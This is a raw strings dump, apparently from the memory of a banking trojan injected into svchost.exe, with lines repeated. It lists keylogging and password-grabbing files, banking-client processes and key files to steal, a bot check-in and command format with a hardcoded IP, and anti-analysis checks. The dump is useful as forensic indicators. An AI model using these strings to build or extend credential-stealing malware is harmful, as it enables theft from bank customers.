Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1020_rwx_00B60000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
NETWORKSERVICE!XP3!F9BE9A8A
NETWORKSERVICE!XP3!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1104_rwx_02BD0000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
